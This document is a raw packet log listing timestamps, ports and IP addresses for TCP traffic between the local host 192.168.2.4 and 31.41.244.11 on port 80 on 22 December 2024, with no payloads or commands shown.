Dec 22, 2024 02:16:16.090895891 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.090950012 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.090986013 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.090996981 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.091031075 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.091717958 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.091788054 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.091804981 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.091840982 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.091854095 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.091887951 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.092617989 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.092690945 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.092716932 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.092751980 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.092766047 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.092801094 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.093478918 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.093540907 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.093586922 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.093624115 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.093642950 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.093671083 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.094357014 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.094419956 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.094475985 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.094516993 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.094535112 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.094559908 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.095285892 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.095335007 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.095520973 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.095557928 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.095572948 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.095611095 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.096163988 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.096223116 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.096271038 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.096306086 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.096321106 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.096347094 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.097028971 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.097081900 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.097143888 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.097179890 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.097193956 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.097224951 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.097907066 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.097955942 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.098020077 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.098053932 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.098071098 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.098093987 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.098790884 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.098841906 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.098896027 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.098932028 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.098944902 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.098978996 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.099685907 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.099736929 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.099798918 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.099833965 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.099847078 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.099878073 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.100605965 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.100658894 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.100697994 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.100733042 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.100745916 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.100776911 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.101468086 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.101516008 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.101598024 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.101633072 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.101645947 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.101680040 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.102377892 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.102507114 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.102518082 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.102556944 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.102562904 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.102601051 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.103271961 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.103333950 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.103399992 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.103446007 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.103454113 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.103492975 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.104280949 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.104326963 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.104393959 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.104439020 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.104444027 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.104480028 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.105015993 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.105067968 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.105314016 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.105362892 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.105431080 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.105477095 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.105484962 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.105519056 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.106220961 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.106275082 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.106288910 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.106338024 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.106340885 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.106394053 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.107089043 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.107141972 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.107247114 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.107281923 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.107297897 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.107325077 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.107983112 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.108041048 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.108098030 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.108131886 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.108150005 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.108167887 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.108858109 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.108913898 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.108969927 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.109005928 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.109019995 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.109040976 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.109733105 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.109782934 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.109849930 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.109884024 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.109900951 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.109924078 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.110637903 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.110711098 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.110735893 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.110752106 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.110784054 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.110800982 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.111522913 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.111592054 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.111620903 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.111637115 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.111666918 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.111687899 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.112390995 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.112464905 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.112483025 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.112498999 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.112528086 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.112543106 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.113286972 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.113343000 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.113382101 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.113439083 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.117788076 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.117804050 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.117819071 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.117850065 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.117866039 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.117973089 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.118021965 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.118236065 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.118264914 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.118297100 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.118325949 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.118851900 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.118908882 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.277451038 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.277585983 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.277586937 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.277625084 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.277635098 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.277662992 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.277667046 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.277712107 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.277796030 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.277857065 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.277990103 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.278562069 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.278620958 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.278661013 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.278700113 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.278708935 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.278740883 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.279445887 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.279500008 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.279565096 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.279601097 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.279617071 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.279643059 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.280347109 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.280400038 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.280440092 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.280474901 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.280491114 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.280517101 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.281222105 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.281276941 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.281317949 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.281353951 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.281368971 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.281395912 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.282104015 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.282157898 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.282218933 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.282253027 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.282267094 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.282294989 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.282993078 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.283051968 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.283099890 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.283137083 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.283154011 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.283176899 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.283899069 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.283951998 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.284008026 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.284044027 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.284059048 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.284091949 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.284759998 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.284815073 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.284847021 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.284895897 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.284897089 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.284945965 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.285651922 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.285706043 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.285758018 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.285793066 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.285809040 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.285830975 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.286528111 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.286576986 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.286643028 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.286679029 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.286695957 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.286740065 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.287446976 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.287504911 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.287585020 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.287623882 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.287633896 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.287673950 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.288319111 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.288377047 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.288427114 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.288461924 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.288476944 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.288508892 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.289201975 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.289251089 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.289319038 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.289354086 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.289367914 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.289413929 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.290127039 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.290189028 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.290198088 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.290234089 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.290246964 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.290276051 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.290978909 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.291029930 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.291079044 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.291114092 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.291131020 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.291156054 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.291891098 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.291940928 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.291994095 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.292030096 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.292048931 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.292078018 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.292752981 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.292812109 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.292879105 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.292913914 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.292933941 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.292958975 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.293668032 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.293720007 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.293752909 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.293788910 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.293798923 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.293834925 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.294531107 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.294583082 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.294673920 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.294708967 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.294723034 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.294763088 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.294785976 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.295433998 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.295488119 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.295555115 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.295591116 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.295607090 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.295634031 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.296308041 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.296360016 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.296576023 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.296624899 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.296696901 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.296731949 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.296752930 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.296776056 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.297492027 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.297545910 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.297651052 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.297686100 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.297704935 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.297724962 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.298393011 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.298448086 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.298506021 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.298541069 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.298558950 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.298582077 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.299272060 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.299334049 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.299396038 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.299429893 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.299448013 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.299470901 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.300183058 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.300236940 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.300282001 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.300316095 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.300335884 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.300355911 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.301055908 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.301110983 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.301160097 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.301194906 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.301214933 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.301234007 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:16.301928997 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:16.301980019 CET	49765	80	192.168.2.4	31.41.244.11
